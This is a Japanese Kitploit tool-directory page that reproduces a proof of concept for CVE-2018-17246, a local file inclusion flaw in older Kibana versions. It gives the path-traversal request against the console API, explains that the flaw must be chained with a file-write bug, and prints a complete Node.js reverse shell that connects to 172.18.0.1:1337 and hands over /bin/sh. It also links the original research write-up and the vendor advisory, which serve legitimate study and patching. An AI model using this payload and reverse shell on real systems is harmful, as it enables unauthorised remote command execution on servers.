Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/mpgn/cve-2018-17246
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングペイロード開発
GitHubmpgn/cve-2018-17246

CVE-2018-17246

CVE-2018-17246 - Kibana LFI < 6.4.3 & 5.6.13

リポジトリを見る
65156年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2018-17246 - Kibana LFI < 6.4.3 & 5.6.13

CyberArk Labs によって発見された Kibana のローカルファイルインクルージョン (LFI)。この LFI は、以下のペイロードを使用して Kibana サーバー上でリバースシェルを実行するために利用できます。

root@kitploit:~
/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../path/to/shell.js

お察しのとおり、この攻撃は無制限のファイルアップロードや、サーバーにファイルを書き込むことを許可するその他の脆弱性と組み合わせる必要があります。

入力検証が行われていないため、JavaScript ファイルの名前を任意のものに変更できます。この場合、パストラバーサル手法を使用して、Kibana サーバー上の任意のファイルを選択できます。 ただし、注意すべき点として、Node の モジュールキャッシング 機能があります。基本的に、LFI はサニタイズされていないユーザー入力を Node の require 関数に送信することで機能するため、インクルードされたモジュール(攻撃者のペイロード)はファイル名によってキャッシュされます。つまり、同じペイロードを、例えばリバースシェルを取り戻すために送信することはできません。

lfi

脆弱性の詳細: https://www.cyberark.com/threat-research-blog/execute-this-i-know-you-have-it/

セキュリティ勧告: https://www.elastic.co/blog/kibana-local-file-inclusion-flaw-cve-2018-17246


  • docker の Kibana バージョン 6.0.0(ElasticSearch をリンクしなくても PoC は動作します)
  • https://github.com/appsecco/vulnerable-apps/tree/master/node-reverse-shell の shell.js
root@kitploit:~
(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(1337, "172.18.0.1", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Node.js アプリケーションのクラッシュを防ぐ
})();
ツールをダウンロード